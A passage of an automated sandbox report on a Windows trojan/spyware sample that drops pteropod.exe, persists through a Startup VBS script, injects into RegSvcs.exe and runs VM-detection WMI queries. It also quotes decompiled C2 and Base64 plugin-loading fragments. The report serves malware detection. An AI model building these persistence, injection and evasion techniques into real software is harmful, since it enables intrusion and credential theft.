Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/5@0/1
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW, 0_2_0044AF5C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464422
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 1_2_00464422
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 1_2_004364AA
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 5_2_00464422
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 5_2_004364AA
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D517
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle, 0_2_0043701F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket, 0_2_0047A999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043614F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\arrogatingly
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\fCXrE8L4kRTm48Ov
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\Temp\drawlingly
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs"
Source: 7xonkSJwuY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7xonkSJwuY.exe ReversingLabs: Detection: 63%
Source: 7xonkSJwuY.exe Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File read: C:\Users\user\Desktop\7xonkSJwuY.exe
Source: unknown Process created: C:\Users\user\Desktop\7xonkSJwuY.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: wntdll.pdbUGP source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Memory
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Source: 7xonkSJwuY.exe Static PE information: real checksum: 0xa2135 should be: 0xc344d
Source: pteropod.exe.0.dr Static PE information: real checksum: 0xa2135 should be: 0xc344d
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004171D1 push ecx; ret 1_2_004171E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0E013 push esp; ret 2_2_06F0E025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0DD17 push edi; iretd 2_2_06F0DD32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EAC7 pushad ; ret 2_2_06F0EAD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070415B2 push eax; iretd 2_2_070415B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708B628 push C40705FCh; iretd 2_2_0708B635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E3BCF push eax; ret 2_2_070E3BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E4274 pushad ; ret 2_2_070E4275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E4698 push es; ret 2_2_070E490C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E48FC push es; ret 2_2_070E490C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146408 push esp; ret 2_2_07146409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07145FB0 push esp; retf 2_2_07145FBD
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004171D1 push ecx; ret 5_2_004171E4
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe

Boot Survival

Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_004772DE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_004375B0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_004772DE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_004375B0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00444078 0_2_00444078
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00444078 1_2_00444078
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00444078 5_2_00444078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API/Special instruction interceptor: Address: 3E4C6B4
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API/Special instruction interceptor: Address: 3BA862C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2602
Source: C:\Users\user\Desktop\7xonkSJwuY.exe API coverage: 3.3 %
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API coverage: 3.5 %
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API coverage: 3.4 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 1_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 1_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 1_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose, 1_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 1_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 5_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 5_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045DD7C FindFirstFileW,FindClose, 5_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_0044BD29
